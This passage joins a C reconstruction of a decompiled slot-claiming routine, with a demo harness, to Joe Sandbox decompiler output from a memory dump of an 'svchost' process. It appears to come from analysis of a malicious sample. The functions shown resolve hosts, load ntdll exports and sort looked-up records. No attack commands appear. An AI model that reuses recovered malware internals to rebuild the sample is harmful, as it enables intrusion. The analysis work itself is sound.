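    size_t i = 0;
    if (n == 0) return;
    for (; i < n - 1 && src[i] != '\0'; i++) dst[i] = src[i];
    dst[i] = '\0';
}

/* Mirror of E0251AB81.  Every slot that is free (state == 1) with an empty
 * target is claimed: flag, target string, forced NUL on the last byte, new
 * state, then the matching counter.  Returns how many slots were claimed
 * (the original returns whatever EAX last held, which is not informative). */
int claim_free_slots(slot_t **slots, int count, char new_state,
                     const char *target, char flag)
{
    int claimed = 0;
    for (int i = 0; i < count; i++) {
        slot_t *s = slots[i];
        if (s->state != 1 || s->target[0] != '\0') continue;
        s->kind_flag = flag;
        lstrcpyn_like(s->target, target, TARGET_LEN);
        s->target[TARGET_LEN - 1] = '\0';   /* *(slot + 0x4f) = 0 in the listing */
        s->state = new_state;
        if (s->state != 2) g_count_other++; else g_count_state2++;
        claimed++;
    }
    return claimed;
}

typedef struct demo_result {
    int    claimed;        /* slots taken by the call */
    size_t copied_len;     /* strlen of the first claimed target */
    long   state2;         /* g_count_state2 after the call */
    long   other;          /* g_count_other after the call */
    int    busy_untouched; /* 1 if the occupied slot was left alone */
} demo_result_t;

/* Constructed sample: three slots, the middle one already occupied, and a
 * 70-character target that is longer than the field can hold. */
demo_result_t run_demo(void)
{
    slot_t a = {0}, b = {0}, c = {0};
    a.state = 1;                            /* free */
    b.state = 2; strcpy(b.target, "busy");  /* occupied: must be skipped */
    c.state = 1;                            /* free */
    slot_t *slots[] = { &a, &b, &c };

    char long_target[71];
    memset(long_target, 'A', 70);
    long_target[70] = '\0';

    g_count_state2 = g_count_other = 0;
    demo_result_t r;
    r.claimed = claim_free_slots(slots, 3, 2, long_target, 'x');
    r.copied_len = strlen(a.target);        /* 61: 0x3e - 1 characters kept */
    r.state2 = g_count_state2;
    r.other = g_count_other;
    r.busy_untouched = (b.state == 2 && strcmp(b.target, "busy") == 0);
    return r;
}

int main(void)
{
    demo_result_t r = run_demo();
    printf("claimed=%d copied_len=%zu state2=%ld other=%ld busy_untouched=%d\n",
           r.claimed, r.copied_len, r.state2, r.other, r.busy_untouched);
    return 0;
}
```

The static assertions are the useful part when turning decompiler offsets into a struct: if a field is mis-sized the build fails instead of silently shifting every later offset. The forced NUL at +0x4f is where lstrcpynA already places its terminator on truncation, so the listing's extra store is defensive rather than a sign of a different buffer size.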

                                                                                                                                  APIs
                                                                                                                                  • gethostbyaddr.WS2_32(00000000,00000004,00000002), ref: 025126C3
                                                                                                                                  • inet_ntoa.WS2_32(?), ref: 025126E4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: gethostbyaddrinet_ntoa
                                                                                                                                  • String ID: localcfg
                                                                                                                                  • API String ID: 2112563974-1857712256
                                                                                                                                  • Opcode ID: 27ed871bd53d86a7787df88fd7ab0809897f1645223f074dac229d52928ec855
                                                                                                                                  • Instruction ID: 3bc40cefb362be4167e18abe560bf72266667948eb04bb190135f4a7192067b6
                                                                                                                                  • Opcode Fuzzy Hash: 27ed871bd53d86a7787df88fd7ab0809897f1645223f074dac229d52928ec855
                                                                                                                                  • Instruction Fuzzy Hash: 84F082321482196BFB04AFA0EC05AAA3B9DEB05250F104426FD08CA0D0EF71D990979C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0251EAE4(CHAR* _a4) {
                                                                                                                                  				struct HINSTANCE__* _t2;
                                                                                                                                  
                                                                                                                                  				_t2 =  *0x25236f4; // 0x77460000
                                                                                                                                  				if(_t2 != 0) {
                                                                                                                                  					L3:
                                                                                                                                  					return GetProcAddress(_t2, _a4);
                                                                                                                                  				} else {
                                                                                                                                  					_t2 = LoadLibraryA("ntdll.dll");
                                                                                                                                  					 *0x25236f4 = _t2;
                                                                                                                                  					if(_t2 != 0) {
                                                                                                                                  						goto L3;
                                                                                                                                  					} else {
                                                                                                                                  						return _t2;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  			}
                                                                                                                                  0x0251eae4
                                                                                                                                  0x0251eaeb
                                                                                                                                  0x0251eb02
                                                                                                                                  0x0251eb0d
                                                                                                                                  0x0251eaed
                                                                                                                                  0x0251eaf2
                                                                                                                                  0x0251eaf8
                                                                                                                                  0x0251eaff
                                                                                                                                  0x00000000
                                                                                                                                  0x0251eb01
                                                                                                                                  0x0251eb01
                                                                                                                                  0x0251eb01
                                                                                                                                  0x0251eaff

                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(ntdll.dll,0251EB54,_alldiv,0251F0B7,80000001,00000000,00989680,00000000,?,?,?,0251E342,00000000,745CF210,80000001,00000000), ref: 0251EAF2
                                                                                                                                  • GetProcAddress.KERNEL32(77460000,00000000), ref: 0251EB07
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: ntdll.dll
                                                                                                                                  • API String ID: 2574300362-2227199552
                                                                                                                                  • Opcode ID: 88978e4f3d93249818abc7ea168c924d362120247599a29c3aa0da0b6acbfaba
                                                                                                                                  • Instruction ID: a0f1da34e1c14b82909f12caf6f4817e4bc5713a5575b17c0e16226b437e3958
                                                                                                                                  • Opcode Fuzzy Hash: 88978e4f3d93249818abc7ea168c924d362120247599a29c3aa0da0b6acbfaba
                                                                                                                                  • Instruction Fuzzy Hash: A4D0C734F4130267AF364F64990BA157AEC7751B417414855A407D15C1D734D41CE60C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E02512F22(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				char _v368;
                                                                                                                                  				void* _t64;
                                                                                                                                  				signed short* _t66;
                                                                                                                                  				intOrPtr* _t67;
                                                                                                                                  				intOrPtr* _t72;
                                                                                                                                  				intOrPtr* _t76;
                                                                                                                                  				intOrPtr* _t82;
                                                                                                                                  				short _t86;
                                                                                                                                  				intOrPtr* _t87;
                                                                                                                                  				signed int _t94;
                                                                                                                                  				intOrPtr _t96;
                                                                                                                                  				signed int _t99;
                                                                                                                                  				short* _t100;
                                                                                                                                  				void* _t101;
                                                                                                                                  				void* _t102;
                                                                                                                                  				void* _t103;
                                                                                                                                  				intOrPtr _t109;
                                                                                                                                  				intOrPtr _t110;
                                                                                                                                  				intOrPtr _t111;
                                                                                                                                  				intOrPtr _t114;
                                                                                                                                  				void* _t115;
                                                                                                                                  				intOrPtr* _t116;
                                                                                                                                  				void* _t117;
                                                                                                                                  				signed int _t118;
                                                                                                                                  				void* _t121;
                                                                                                                                  				void* _t122;
                                                                                                                                  				void* _t123;
                                                                                                                                  				void* _t124;
                                                                                                                                  
                                                                                                                                  				_t116 = _a12;
                                                                                                                                  				_t94 = 0;
                                                                                                                                  				 *_t116 = 0;
                                                                                                                                  				_t117 = E02512D21(_a4);
                                                                                                                                  				if(_t117 != 0) {
                                                                                                                                  					if( *_t117 != 0) {
                                                                                                                                  						_v12 = _t117;
                                                                                                                                  						_a12 = _a8;
                                                                                                                                  						while(_t94 < 5) {
                                                                                                                                  							_t9 = _t117 + 8; // 0x8
                                                                                                                                  							_t104 = _t9;
                                                                                                                                  							_t82 = _t9;
                                                                                                                                  							_t10 = _t82 + 1; // 0x9
                                                                                                                                  							_v8 = _t10;
                                                                                                                                  							do {
                                                                                                                                  								_t114 =  *_t82;
                                                                                                                                  								_t82 = _t82 + 1;
                                                                                                                                  							} while (_t114 != 0);
                                                                                                                                  							E0251EE08(_a12, _t104, _t82 - _v8 + 1);
                                                                                                                                  							_t86 =  *((intOrPtr*)(_t117 + 4));
                                                                                                                                  							_a12 = _a12 + 0x100;
                                                                                                                                  							_t122 = _t122 + 0xc;
                                                                                                                                  							 *_t116 =  *_t116 + 1;
                                                                                                                                  							_t117 =  *_t117;
                                                                                                                                  							 *((short*)(_t121 + _t94 * 2 - 0x6c)) = _t86;
                                                                                                                                  							_t94 = _t94 + 1;
                                                                                                                                  							if(_t117 != 0) {
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  							break;
                                                                                                                                  						}
                                                                                                                                  						HeapFree(GetProcessHeap(), 0, _v12);
                                                                                                                                  						_v8 = _v8 & 0x00000000;
                                                                                                                                  						if( *_t116 == 1) {
                                                                                                                                  							L24:
                                                                                                                                  							return 1;
                                                                                                                                  						}
                                                                                                                                  						_t64 =  *_t116 - 1;
                                                                                                                                  						_a12 = _a8;
                                                                                                                                  						do {
                                                                                                                                  							_t118 = _v8;
                                                                                                                                  							_t99 = _t118;
                                                                                                                                  							if(_t118 >=  *_t116 - 1) {
                                                                                                                                  								L17:
                                                                                                                                  								_t66 = _t121 + _v8 * 2 - 0x6c;
                                                                                                                                  								_t100 = _t121 + _t118 * 2 - 0x6c;
                                                                                                                                  								 *_t66 =  *_t100;
                                                                                                                                  								_t67 = _a12;
                                                                                                                                  								 *_t100 =  *_t66 & 0x0000ffff;
                                                                                                                                  								_t101 = _t67 + 1;
                                                                                                                                  								do {
                                                                                                                                  									_t109 =  *_t67;
                                                                                                                                  									_t67 = _t67 + 1;
                                                                                                                                  								} while (_t109 != 0);
                                                                                                                                  								E0251EE08( &_v368, _a12, _t67 - _t101 + 1);
                                                                                                                                  								_t123 = _t122 + 0xc;
                                                                                                                                  								_t120 = (_t118 << 8) + _a8;
                                                                                                                                  								_t72 = (_t118 << 8) + _a8;
                                                                                                                                  								_t102 = _t72 + 1;
                                                                                                                                  								do {
                                                                                                                                  									_t110 =  *_t72;
                                                                                                                                  									_t72 = _t72 + 1;
                                                                                                                                  								} while (_t110 != 0);
                                                                                                                                  								E0251EE08(_a12, _t120, _t72 - _t102 + 1);
                                                                                                                                  								_t76 =  &_v368;
                                                                                                                                  								_t124 = _t123 + 0xc;
                                                                                                                                  								_t103 = _t76 + 1;
                                                                                                                                  								do {
                                                                                                                                  									_t111 =  *_t76;
                                                                                                                                  									_t76 = _t76 + 1;
                                                                                                                                  								} while (_t111 != 0);
                                                                                                                                  								goto L23;
                                                                                                                                  							} else {
                                                                                                                                  								goto L14;
                                                                                                                                  							}
                                                                                                                                  							do {
                                                                                                                                  								L14:
                                                                                                                                  								if( *((intOrPtr*)(_t121 + _t99 * 2 - 0x6a)) <  *((intOrPtr*)(_t121 + _t99 * 2 - 0x6c))) {
                                                                                                                                  									_t32 = _t99 + 1; // 0x1
                                                                                                                                  									_t118 = _t32;
                                                                                                                                  								}
                                                                                                                                  								_t99 = _t99 + 1;
                                                                                                                                  							} while (_t99 < _t64);
                                                                                                                                  							goto L17;
                                                                                                                                  							L23:
                                                                                                                                  							E0251EE08(_t120,  &_v368, _t76 - _t103 + 1);
                                                                                                                                  							_a12 = _a12 + 0x100;
                                                                                                                                  							_t122 = _t124 + 0xc;
				_v8 = _v8 + 1;
				_t64 =  *_t116 - 1;
			} while (_v8 < _t64);
			goto L24;
		}
		_t3 = _t117 + 8; // 0x8
		_t105 = _t3;
		_t87 = _t3;
		_t4 = _t87 + 1; // 0x9
		_t115 = _t4;
		do {
			_t96 =  *_t87;
			_t87 = _t87 + 1;
		} while (_t96 != 0);
		E0251EE08(_a8, _t105, _t87 - _t115 + 1);
		 *_t116 =  *_t116 + 1;
		HeapFree(GetProcessHeap(), 0, _t117);
		goto L24;
	}
	return 0;
}

APIs
  • Part of subcall function 02512D21: GetModuleHandleA.KERNEL32(00000000,7620EA30,?,00000000,02512F01,?,025120FF,02522000), ref: 02512D3A
  • Part of subcall function 02512D21: LoadLibraryA.KERNEL32(?), ref: 02512D4A
• GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02512F73
• HeapFree.KERNEL32(00000000), ref: 02512F7A
Memory Dump Source
• Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
Yara matches
Similarity
• API ID: Heap$FreeHandleLibraryLoadModuleProcess
• String ID:
• API String ID: 1017166417-0
• Opcode ID: 13feb46b08af8723980838575efdc484aeb2c4e330a15d2132e61f0ca288d69b
• Instruction ID: f1b5a7771c3130fbee38a81b06a7005b0e7ac97ba40986e00f3635dbbdd88e70
• Opcode Fuzzy Hash: 13feb46b08af8723980838575efdc484aeb2c4e330a15d2132e61f0ca288d69b
• Instruction Fuzzy Hash: 3F51C27190021AAFEF01DF64D888AF9BBB5FF05304F1045A9EC96C7210E732DA19CB84
Uniqueness

Uniqueness Score: -1.00%